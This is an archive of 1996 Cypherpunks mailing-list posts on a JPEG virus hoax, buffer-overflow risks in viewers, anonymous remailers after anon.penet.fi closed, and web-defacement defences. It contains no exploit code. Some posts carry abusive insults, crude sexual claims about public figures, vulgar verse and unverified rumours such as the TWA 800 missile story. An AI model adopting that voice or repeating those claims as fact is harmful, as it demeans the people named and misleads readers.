From pstira at escape.com Sun Sep 1 00:53:28 1996 From: pstira at escape.com (pstira at escape.com) Date: Sun, 1 Sep 1996 15:53:28 +0800 Subject: WARNING vIRuS! In-Reply-To: <199608311621.LAA20992@netnet1.netnet.net> Message-ID: On Sat, 31 Aug 1996, kickboxer wrote: > 99.9% of > virus scanners and other antivirus programs will not recognize it > scan all images upon download! duh From alano at teleport.com Sun Sep 1 01:35:20 1996 From: alano at teleport.com (Alan Olsen) Date: Sun, 1 Sep 1996 16:35:20 +0800 Subject: WARNING vIRuS! Message-ID: <3.0b11.32.19960831234035.00b1f6cc@mail.teleport.com> At 11:21 AM 8/31/96 -0500, kickboxer ingnoring the "clueserver refused by host" messages wrote: > There is a new and VERY dangerous virus called the HAZ-MAT virus! >it fucks up the sectors on your hd, and really messes up the partition >tables. It does this once a week, picking a random time to do it. 99.9% of >virus scanners and other antivirus programs will not recognize it, for it is >a totally new strain, using a never before seen code.... Be warned! The >HAZ-MAT virus usually resides in JPG, and GIF files... once the files are >viewed, the virus takes effect. >scan all images upon download! This is the clueless kind of crap I expect pitched to AOL users and upper level management. GIF and JPEGs contain *NO* executable code. You cannot get viruses from them. You obviously have no clue as to what the hell you are talking about. The only way that you could obtain the effects described above is with Black Magic and/or Voodoo. (And not even then.) I remember a similar hoax going around about 3-4 years ago about viruses in image files. I guess nothing on the net is ever forgotten entirely. Especially the urban legends and bullshit. --- | "Remember: You can't have BSDM without BSD." - alan at ctrl-alt-del.com | |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From furballs at netcom.com Sun Sep 1 01:37:50 1996 From: furballs at netcom.com (Paul S. Penrod) Date: Sun, 1 Sep 1996 16:37:50 +0800 Subject: WARNING vIRuS! In-Reply-To: Message-ID: On Sat, 31 Aug 1996, Mark M. wrote: > On Sat, 31 Aug 1996, Paul S. Penrod wrote: > > > Binary launches are the way they do it, and the way a virus spreads, > > unless you get caught up with autoexecuting Word and Excel macros. > > > > I have yet to see *any* truly data propogating viruses. > > Would you count the fingerd exploit used in the Internet Worm as a data > propogating virus? If a poorly written mail program doesn't do bounds > checking, it could conceivably allow for a Good Times-like virus. However, > highly unlikely, since mail programs are too diverse and it would be very > doubtful that a brain-dead mail program would become very widespread. I would > be much more worried about other non-email programs that fail to do bounds > checking (like Netscape v1.1). > > -- Mark > No, I wouldn't consider the fingerd exploit a data propogated virus in the same sense as data embedded in a purely passive activity (viewing an image file) which somehow launches a vicious nasty on your disk. However, you do bring up an interesting point in that example. Netscape and programs of that ilk, IMO, yield antoher exploitable pathway into a system, should someone figure a method to shove a jam into the doorway to keep the door open long enough to allow a renegade proc to be started and executed outside the control of the local operator. ...Paul From mpd at netcom.com Sun Sep 1 02:29:10 1996 From: mpd at netcom.com (Mike Duvos) Date: Sun, 1 Sep 1996 17:29:10 +0800 Subject: ^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿WARNING^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿^¿ vIRuS! In-Reply-To: <3.0b11.32.19960831234035.00b1f6cc@mail.teleport.com> Message-ID: <199609010741.AAA25267@netcom8.netcom.com> Alan Olsen writes: > This is the clueless kind of crap I expect pitched to AOL users and > upperlevel management. > GIF and JPEGs contain *NO* executable code. You cannot get viruses > from them. You obviously have no clue as to what the hell you are > talking about. > The only way that you could obtain the effects described above is > with Black Magic and/or Voodoo. (And not even then.) I don't want to restart the jpg-virus flame war again, and this particular story is likely completely bogus, but I should point out that most complicated software, including jpeg viewers, has undiscovered bugs lurking about. It is also not particularly difficult to find a garbage input file for most sloppily written programs which bombs the program into branching into one of its data buffers. Indeed, it wasn't so long ago that you could get httpd to put crap on its own stack by feeding it an excessively long URL. So I would certainly not be surprised if someone managed to construct a .jpg file which would do nasty things to ones machine if loaded with a specific viewer, and give an error message when loaded by other software. If the viewer was a widely used one, and the .jpg was posted on Usenet with an alluring title, one could probably do quite a bit of damage before people got wise. Not a virus in the traditional sense, but a fairly common way to attack complicated operating systems and applications. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From strix at rust.net Sun Sep 1 02:51:54 1996 From: strix at rust.net (Jennifer Mansfield-Jones) Date: Sun, 1 Sep 1996 17:51:54 +0800 Subject: Dr. Vulis is a test, right? [was RE: Desubscribe] In-Reply-To: <2.2.32.19960830224855.00355560@labg30> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 30 Aug 1996, John Deters wrote: > So, my original question is: is there really a Dr. Dmitri Vulis (KOTM) > somewhere? Or is he just some made-up straw man, created by Tim May, John > Gilmore and Eric Hughes for their personal amusement, and to add a spot of There is somebody by this name in the field: the City University of New York granted a PhD to one Dimitri Vulis in 1995. The dissertation title was "Collective encryption: Cryptosystems based on the commutator collection process for certain free products". As to whether the existence of someone with any given name has any bearing on the identity of any participant in cypherpunks, well, this list has discussed that general topic before... regards, `=-`=-`=-`=- -='-='-='-=' Jennifer Mansfield-Jones http://www.rust.net/~strix/strix.html strix at rust.net PGP key ------^ Never try to outstubborn a cat. (R.A.H.) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMijdakxVmNNM34OxAQE98gP9HrRQPCSFYkenAWZB9lriBYu5zA0PCLXs 5Z/3NijVdrT2sHeMawDumYwuk+l9xgIUObmB8c2njGLLrZmZERSyWzbUPI5PRWp2 KvPNA1G1F6SBwedcO9cW342dgwZadpjU5zdxkPvTLDO9cHqNrf5hk8yQp3RlUj3v iOsef3tQ85s= =VJmp -----END PGP SIGNATURE----- From paul at fatmans.demon.co.uk Sun Sep 1 05:13:50 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sun, 1 Sep 1996 20:13:50 +0800 Subject: Desubscribe Message-ID: <841572883.28748.0@fatmans.demon.co.uk> > Whoever uses the term "spam" in derogatory manner, opposes free > speech and deserves to be caned. Whoever uses the term "spam" in a non-derogratory manor is an arsehole and deserves to be shipped to sweden where they shall be made into cheese by nuns. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From paul at fatmans.demon.co.uk Sun Sep 1 05:26:23 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sun, 1 Sep 1996 20:26:23 +0800 Subject: Encryption Message-ID: <841572886.28792.0@fatmans.demon.co.uk> > Algorithm: Select bit-groups of random length from the file until the file is > completely processed. Shuffle the bits in each group randomly and > save each group back to the file. Repeat if needed using different > key-strings for each successive encryption, for increased security. You pay no attention whatsoever to key distribution, the fact that this is just a form of permutation and no substitution is used, also how do you account for the fact that the user`s random number source may not be strong, even recognized rng`s like the keyboard latency routines in pgp grind to a halt when faced with a hardware perculiarity like a keyboard buffer etc... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From farber at central.cis.upenn.edu Sun Sep 1 05:53:04 1996 From: farber at central.cis.upenn.edu (Dave Farber) Date: Sun, 1 Sep 1996 20:53:04 +0800 Subject: Esther Dyson on Remailers Message-ID: <3.0b11.32.19960901065251.00715d08@linc.cis.upenn.edu> EFF does not, to my knowledge, (and I am a Board Member) have an organizational view on this issue. There are a lot of different views and each member of EFF has their own view that they can and will state as private people. The tendency of the Press to label people with organizations affiliation ship gives the impression of organizational views. For example I certainly don't speak for the University of Pennsylvania when I say thing to the newspapers. Dave http://macpond.cis.upenn.edu From stewarts at ix.netcom.com Sun Sep 1 06:02:53 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Sun, 1 Sep 1996 21:02:53 +0800 Subject: Pseudonym server: Jenaer Anonymous Service Message-ID: <199609011109.EAA24157@toad.com> Jenaer Anonymous Service looks like a high-security pseudonym server. You can send outgoing mail to email or newsgroups. It accepts encrypted email addressed to anon-hexkeyid at as-node.jena.thur.de, where hexkeyid is the keyid for a PGP key you send it; it doesn't store any information about the owner of the key. To pick up your mail, you send it an encrypted message with the keyid and a Reply-To: header, and it sends you your mail by mixmaster. It's a bit less user-friendly than some servers, since you not only need PGP, but you need to pick up your mail rather than having it arrive directly. But in return, it's pretty secure, since you can only get caught if the remailer or its operator are compromised when you request a delivery. I haven't yet checked if how flexible it is about the location of Reply-To: in the headers, since some mailers make it difficult to paste that in. The public key for the server is signed by Lutz.Donnerhacke at Jena.Thur.De, which is in turn signed by 0x3B7F286D, which MIT thinks is an unknown signator... The help message has a policy against illegal activity, flamewars, and binary files, and says people can be blacklisted for abuse. Because you don't get your reply email until you ask to pick it up, it does seem easy to abuse; complaints, flames, and mailbombs won't reach you if you don't ask for them. I hope the operator doesn't mind the workload of managing the remailer - it looks like a good service, and with Julf's remailer shut down, we need more nymservers. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Reassign Authority! From erehwon at c2.net Sun Sep 1 06:22:09 1996 From: erehwon at c2.net (William Knowles) Date: Sun, 1 Sep 1996 21:22:09 +0800 Subject: The Three Horsemen??? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- It seems most everywhere I turn, either on the Internet or on television there is some reference to the Four Horseman of the Infocalypse, -Terrorists, Pedophiles, Drug Dealers and Money Launderers, But no real hard evidence. But since the story broke in the Observer I have been trying to remember where I heard of Toby Tyler before, I belive it was on a television show on the Discovery Channel that Tim May was in, and recently I found this about Mr. Tyler in the Clari. newsgroups reporting on the child sex trade. == One professional cybercop is Toby Tyler, who surfs the Net from his computer terminal in the San Bernadino (Calif.) County Sheriff's Department. He searches for scams, sources of child porn, and deceptions designed to entrap children. Five investigators in his department are busy full-time investigating child sexual exploitation - much of it flowing from pedophiles trying to set up meetings with children by computer. The Internet is a ``two-edged sword'' for child pornographers, Deputy Tyler says. On the one hand, he says, it seems to have damaged the profitability of pornographers who sell their wares via dial-up computer ``bulletin board.'' There is so much free stuff on the Internet - why would anyone pay? == Wouldn't the Observer article about anon.penet.fi transmitting 75 to 90% of the child porn on the Internet lead you to belive that since it has been shut down that all Internet child porn will pretty much dry up? I Wonder if its now the Three Horsemen of the Infocalypse? William Knowles erehwon at c2.net -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMimNkQURbnwsNLz5AQEncgQAonfr7b67BZfLOjJxnS8GzlZ3RSoGYBMT 07uacF3sIkH9vyXVnG3O4BKbptb28dPBm1OoN7dufTyu7WxEi91sQNcY++MUmwhO vRR+yWcSWTAeOb1AwDZFXxRLdFCJHbshb6M6P4ECa2VA6ONGH/lTgy/dZS6Zk1Nb vD7jCUw8k2s= =jRGc -----END PGP SIGNATURE----- -- William Knowles PGP mail welcome & prefered / KeyID 1024/2C34BCF9 PGP Fingerprint 55 0C 78 3C C9 C4 44 DE 5A 3C B4 60 9C 00 FB BD Finger for public key -- Vote for Harry Browne in November -- http://www.HarryBrowne96.org From dlv at bwalk.dm.com Sun Sep 1 06:31:35 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 1 Sep 1996 21:31:35 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: Senile tcmay at got.net (Timothy C. May) (fart) rants: > (* I find it Orwellian that being "polite" is taken to mean not saying > anything controversial. It was impolite for Salman Rushdie to write "The > Satanic Verses," is was impolite for people to mention Karla Homulka in > talk.politics.canada, it was impolite to point out that the prime minister > of India drinks a glass of his own urine every day, it was impolite to > refer to Bill Clinton's dalliances with Paula Jones, and so on. Paula Jones is a virtuous woman. Her boss, Bill Clinton, pulled down his pants and ordered her to kiss his erect penis. She refused and was fired. I think it's factually incorrect to describe this sexual harrassment as "dalliances", but we already know that senile Tim May (fart) never lets any facts get in the way of his agenda. It may be impolite to fart in senile Tim May's (fart) general direction, but we do. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sun Sep 1 06:32:03 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 1 Sep 1996 21:32:03 +0800 Subject: Code Review Guidelines (draft) In-Reply-To: <199608312040.PAA20696@manifold.algebra.com> Message-ID: <1kkkTD37w165w@bwalk.dm.com> ichudov at algebra.com (Igor Chudov @ home) writes: > pOL at BILA PARNQ Q, > oKAZALSQ BEZ HUQ. > nA HUQ MNE BEZ HUQ, > kOGDA S HUEM DO HUQ? dEWKI W GOSTI PRIGLA[ALI, dA Q W GOSTI NE PO[EL - pIDVA^I[KO NA MNE RWANYJ, dA HUI[KO NEBOLX{OJ. Decrypt this, Midwestern swines. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From patrickbc at juno.com Sun Sep 1 07:44:36 1996 From: patrickbc at juno.com (patrick b cummings) Date: Sun, 1 Sep 1996 22:44:36 +0800 Subject: hackers texts Message-ID: <19960831.074413.9510.3.patrickbc@juno.com> If any of you hackers out their have wrote any texts for beginning hackers or know of any please send them to me at patrickc at juno.com thank you P. cummings Patrickbc at juno.com From patrickbc at juno.com Sun Sep 1 07:50:23 1996 From: patrickbc at juno.com (patrick b cummings) Date: Sun, 1 Sep 1996 22:50:23 +0800 Subject: hackerlist Message-ID: <19960831.074413.9510.2.patrickbc@juno.com> I am planning to make a list of hackers and would appreciatte it if you would e-mail me with the following information. handle e-mail city,state url whether or not you would like to recieve the list when finished thanks for your help P. Cummings Patrickbc at juno.com From bygg at sunet.se Sun Sep 1 09:38:39 1996 From: bygg at sunet.se (Johnny Eriksson) Date: Mon, 2 Sep 1996 00:38:39 +0800 Subject: Desubscribe Message-ID: > Whoever uses the term "spam" in a non-derogratory manor is an > arsehole and deserves to be shipped to sweden where they shall be > made into cheese by nuns. No thanks, we do not want them. --Johnny "A government that fears its citizens -- should" From proff at suburbia.net Sun Sep 1 09:47:56 1996 From: proff at suburbia.net (Julian Assange) Date: Mon, 2 Sep 1996 00:47:56 +0800 Subject: hackerlist In-Reply-To: <19960831.074413.9510.2.patrickbc@juno.com> Message-ID: <199609011450.AAA22573@suburbia.net> > I am planning to make a list of hackers and would appreciatte it if you > would e-mail me with the following information. > handle > e-mail > city,state > url > whether or not you would like to recieve the list when finished > thanks for your help > P. Cummings > Patrickbc at juno.com Are you on this list of morons? -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From ichudov at algebra.com Sun Sep 1 10:05:27 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 01:05:27 +0800 Subject: Moscowchannel.com hack In-Reply-To: Message-ID: <199609011509.KAA26254@manifold.algebra.com> snow wrote: > > On Sat, 31 Aug 1996, Joel McNamara wrote: > > > Not really crypto, but related to the DOJ hack in a way. > > > > Moscow Channel is a pretty slick, Russian news/commentary page. Their Web > > site was hacked and altered by someone who didn't seem to like Russians all > > Just a matter of time before some builds a dedicated Satan type tool that > > scans for HTTP server holes or messed up file permissions to make locating > > potential victims easy. > Write your web site to a CD-ROM and hard-code the base directory into the > webserver. A hacker who has root can forcibly unmount the cdrom and mount another directory on that node. Not a good solution. - Igor. From paul at fatmans.demon.co.uk Sun Sep 1 10:23:30 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 2 Sep 1996 01:23:30 +0800 Subject: anon.penet.fi: URGENT REQUEST Message-ID: <841590548.16439.0@fatmans.demon.co.uk> FAO: ALL CYPHERPUNKS & COMMUNITY LIST READERS I wish to gauge the response on something here: Following the closure of the anon.penet.fi remailer: If I can get enough funding to cover all expenses (I am a student and cannot unfortunately contribute much myself) I will install lines and hardware at my premises and run the equivalent to the anon.penet.fi remailer. I don`t know what the response to this will be, I need approximately 5000 UK pounds to set up such an operation (Yes, a leased line really does cost that much in the UK) and then a monthly income of around 3000 UK pounds. The service, I propose, would be free to the users, and maintained my by voluntary donation, no access restriction would be placed on non-paying users. Please send me mail at paul at fatmans.demon.co.uk with the subject as ANON.PENET.FI SERVER and the message body an ammount in UK pounds or dollars (approximate ammounts are OK) so I can guage the response. NO MONEY WILL BE TAKEN AT THE PRESENT TIME. As I said, I just want to see what teh response is like and to see if it would be possible, I also would be unable to set it up until I had some solid commintment from the people giving the money, I expect a large response to this and a measly one to the real appeal for hard cash if it goes ahead! - anyway, mail me and i`ll report the response back soon... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From bdurham at metronet.com Sun Sep 1 10:34:07 1996 From: bdurham at metronet.com (Brian Durham) Date: Mon, 2 Sep 1996 01:34:07 +0800 Subject: hackers texts In-Reply-To: <19960831.074413.9510.3.patrickbc@juno.com> Message-ID: <3229ADAB.7FD5@metronet.com> Again, you may want to do a web search with Yahoo (www.yahoo.com) or hotbot (www.hotbot.com) or whatever. There is loads of good info out there and pointers to ftp sites ... you just need to do a little bit of legwork to find it all. (Along with being creative when asked for keywords by the search engines) Brian bdurham at metronet.com From angelos at gradin.cis.upenn.edu Sun Sep 1 11:02:24 1996 From: angelos at gradin.cis.upenn.edu (Angelos D. Keromytis) Date: Mon, 2 Sep 1996 02:02:24 +0800 Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd) In-Reply-To: Message-ID: <199609011605.MAA26536@gradin.cis.upenn.edu> -----BEGIN PGP SIGNED MESSAGE----- In message , Alan Horowitz writ es: > >The problem is, from my experience at Roosevelt Roads, the Navy never >conducts live fire exercises without declaring the area of operation >strictly off limits to non-military aircraft. Also, the 747 would have >shown up WITH ITS TRANSPONDER DATA on the screens on an Aegis ship, so why >would they fire? And, I didn't think that a P3 pilot would fly around in This has happened before; an Aegis ship in the Persian Gulf shot down an Iranian Airlines (or whatever it's called) aircraft; i'm not sure how many died in that incident (i think about 70 - can very well be wrong). The US just "apologized" for the mistake AFAIK. - -Angelos PS. This happened 8-10 years ago if i recall well. -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBMim0Lr0pBjh2h1kFAQF8AwP8CHSR3sz4tWUbulIWyYgpULLJHtFD3Wag KQx7t+nWyt78TWvZzsFwgGhD295+Ki3PTUGPlWHqO1p0SftReHXuNqOqYXY6EI1p S7eSrrML2YbUTlJ7GLgPCwYEwaeHuyFUNRHoIwmFBLjDnlJZRhKYhhomw5k7EKvl mwU6daPDCiY= =u9kk -----END PGP SIGNATURE----- From jamesd at echeque.com Sun Sep 1 11:02:55 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 2 Sep 1996 02:02:55 +0800 Subject: anon.penet.fi: URGENT REQUEST Message-ID: <199609011608.JAA22545@dns1.noc.best.net> At 03:09 PM 9/1/96 +0000, paul at fatmans.demon.co.uk wrote: > I don`t know what the response to this will be, I need approximately > 5000 UK pounds to set up such an operation (Yes, a leased line really > does cost that much in the UK) and then a monthly income of around > 3000 UK pounds. A little greedy. Other people have set up a multitude of remailers for substantially less. We now need remailers, preferably many, many small remailers rather than one big remailer, that is as easy to reply to as alt.penet.fi, but which gives substantially better security, that is to say the reply address can map to a remailer chain, instead of being constrained to map to a regular address as the penet.fi remailer did. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jya at pipeline.com Sun Sep 1 11:07:17 1996 From: jya at pipeline.com (John Young) Date: Mon, 2 Sep 1996 02:07:17 +0800 Subject: Beta Scam Message-ID: <199609011609.QAA18242@pipe6.t2.usa.pipeline.com> http://www.economist.com/issue/31-08-96/wb1.html Beware Geeks bearing gifts The Internet is well known as a pioneer when it comes to technology. Less noticed is its role on the cutting edge of management fashion. Nowadays, it is fashionable for firms to "outsource" product development to just about everybody. Leading Internet firms have developed this method a stage further: they have found an outside supplier so keen to tender his services that he is sometimes willing to pay for the privilege. The name of this fool? The consumer. [More on beta-scamming at the URL.] From jamesd at echeque.com Sun Sep 1 11:12:03 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 2 Sep 1996 02:12:03 +0800 Subject: Desubscribe Message-ID: <199609011607.JAA22532@dns1.noc.best.net> > > deserves to be shipped to sweden where they shall be > > made into cheese by nuns. At 04:40 PM 9/1/96 DST, Johnny Eriksson wrote:> > No thanks, we do not want them. You are Swedish? I heard on talk.politics.guns somebody say that in Sweden they had banned knives with a sharp point at the end, and were going to ban sharp knives altogether. I think he was just engaging in hyperbole, that he really meant that gun control in Sweden was unreasonably strict, but on reflection I am not sure. What is the story? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From ichudov at algebra.com Sun Sep 1 11:29:52 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 02:29:52 +0800 Subject: Bob Dole on Drugs Message-ID: <199609011633.LAA30982@manifold.algebra.com> http://allpolitics.com/news/9608/31/radio.addresses/ ... snip ... Dole, who returned to Washington for Labor Day weekend, also pledged to use the White House as a bully pulpit to promote the "moral message" against drugs and to criticize what he called the entertainment industry's glamorization of drug use. On Sunday, he is to address the convention of the National Guard Association of the United States during which he's expected to propose that the military be enlisted to assist in a renewed war on drugs. From agt387465 at blackhel.fbi.gov Sun Sep 1 11:39:15 1996 From: agt387465 at blackhel.fbi.gov (David Pfeiffer 387465) Date: Mon, 2 Sep 1996 02:39:15 +0800 Subject: Hacker list information Message-ID: Patrick: I am interested in a copy of your mailing list. Thank you. David Pfeiffer From bdavis at thepoint.net Sun Sep 1 11:50:24 1996 From: bdavis at thepoint.net (Brian Davis) Date: Mon, 2 Sep 1996 02:50:24 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: On Sat, 31 Aug 1996, Timothy C. May wrote: > To be blunt, if Singapore wants to stop me from discussing the dictator Yew > and his feeble son, they can't. Except by pulling the plugs on forums in > which my posts are carried. I consider this a Good Thing (that politicians > in Country A generally have no power to tell citizen-units in Country B > what they can say and what they can't). Unless they adopt "Assassination Protection [of the "ignorant" masses]!! And they won't use remailers ... EBD > > --Tim May > > > -- > [This Bible excerpt awaiting review under the U.S. Communications Decency > Act of 1996] > And then Lot said, "I have some mighty fine young virgin daughters. Why > don't you boys just come on in and fuck them right here in my house - I'll > just watch!"....Later, up in the mountains, the younger daughter said: > "Dad's getting old. I say we should fuck him before he's too old to fuck." > So the two daughters got him drunk and screwed him all that night. Sure > enough, Dad got them pregnant, and had an incestuous bastard son....Onan > really hated the idea of doing his brother's wife and getting her pregnant > while his brother got all the credit, so he pulled out before he > came....Remember, it's not a good idea to have sex with your sister, your > brother, your parents, your pet dog, or the farm animals, unless of course > God tells you to. [excerpts from the Old Testament, Modern Vernacular > Translation, TCM, 1996] > > > From jk at stallion.ee Sun Sep 1 11:56:04 1996 From: jk at stallion.ee (=?ISO-8859-1?Q?J=FCri_Kaljundi?=) Date: Mon, 2 Sep 1996 02:56:04 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <841590548.16439.0@fatmans.demon.co.uk> Message-ID: Sun, 1 Sep 1996 paul at fatmans.demon.co.uk wrote: > I don`t know what the response to this will be, I need approximately > 5000 UK pounds to set up such an operation (Yes, a leased line really > does cost that much in the UK) and then a monthly income of around > 3000 UK pounds. I remember the load on anon.penet.fi was something like 7500 messages daily. As for connection, you will need 64kbps line or even less in case you compress the messages. The machine could be either an older Sun Sparc or a PC running free Unix (Linux/FreeBSD/...) Here in Estonia 64kbps costs between 400-600 USD per month, machine would be something like 1000-2000 USD. Still I believe someone setting up a remailer should do so for free, from their own or company resources. The best way would be every ISP to set up their own remailers and nym servers. J�ri Kaljundi AS Stallion jk at stallion.ee From ichudov at algebra.com Sun Sep 1 12:12:07 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 03:12:07 +0800 Subject: Moscowchannel.com hack In-Reply-To: <199609011723.NAA00697@nrk.com> Message-ID: <199609011722.MAA31289@manifold.algebra.com> David Lesher wrote: > > Igor Chudov @ home sez: > > > > > Write your web site to a CD-ROM and hard-code the base directory into the > > > webserver. > > > > A hacker who has root can forcibly unmount the cdrom and mount another > > directory on that node. Not a good solution. > > Real hard disks such as RL02's & RK07's have WRITE DISABLE > switches.... > You can't mount the whole Unix read-only, so there will always be a place to put the hacked web page, and then mount that place over DocumentRoot. - Igor. From wb8foz at nrk.com Sun Sep 1 12:16:50 1996 From: wb8foz at nrk.com (David Lesher) Date: Mon, 2 Sep 1996 03:16:50 +0800 Subject: Moscowchannel.com hack In-Reply-To: <199609011509.KAA26254@manifold.algebra.com> Message-ID: <199609011723.NAA00697@nrk.com> Igor Chudov @ home sez: > > > Write your web site to a CD-ROM and hard-code the base directory into the > > webserver. > > A hacker who has root can forcibly unmount the cdrom and mount another > directory on that node. Not a good solution. Real hard disks such as RL02's & RK07's have WRITE DISABLE switches.... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From ichudov at algebra.com Sun Sep 1 12:22:56 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 03:22:56 +0800 Subject: It is good that anon.penet.fi has been closed! Message-ID: <199609011733.MAA31382@manifold.algebra.com> Yes, subject says it all. anon.penet.fi was a whole lot worse than cypherpunks remailers. It provided clueless users with no real security, because it stored return addresses and did not use chaining and encryption. Maybe closing of anon.penet.fi will spur real interest from the unwashed alt.sex.* masses to the truly secure remailers. - Igor. From frissell at panix.com Sun Sep 1 12:43:47 1996 From: frissell at panix.com (Duncan Frissell) Date: Mon, 2 Sep 1996 03:43:47 +0800 Subject: Esther Dyson on Remailers Message-ID: <2.2.32.19960901173906.00730cd8@panix.com> At 06:52 AM 9/1/96 -0400, Dave Farber wrote: >EFF does not, to my knowledge, (and I am a Board Member) have an >organizational view on this issue. There are a lot of different views and >each member of EFF has their own view that they can and will state as >private people. The tendency of the Press to label people with organizations >affiliation ship gives the impression of organizational views. For example I >certainly don't speak for the University of Pennsylvania when I say thing to >the newspapers. > >Dave > At CFP in '95 in SF, Esther expressed the view that there was a place on the Net for an anonymous ghetto (my words not hers) where people could be anonymous but that most of the net would involve traceability of transactions so that people could be held accountable and that businesses and individuals would want to know who they were dealing with for payment and accountability reasons. I am not stating her position well I'm sure but it was clear that she thought that non-anonymity would be the rule not because it was mandated but just because Net actors would want it that way. A short quote would not allow anyone to understand her full position. If she believes that anonymity would be rejected voluntarily for practical reasons then that is just a prediction of a market not a conclusion. Most on this list would have no objection to making a prediction though we might disagree with it. Just as Esther predicted that the net would end copyright, we might predict that the net combined with immediate settlement payment systems might reduce if not eliminate the need for "positive ID." DCF From markm at voicenet.com Sun Sep 1 13:19:20 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 2 Sep 1996 04:19:20 +0800 Subject: Moscowchannel.com hack In-Reply-To: 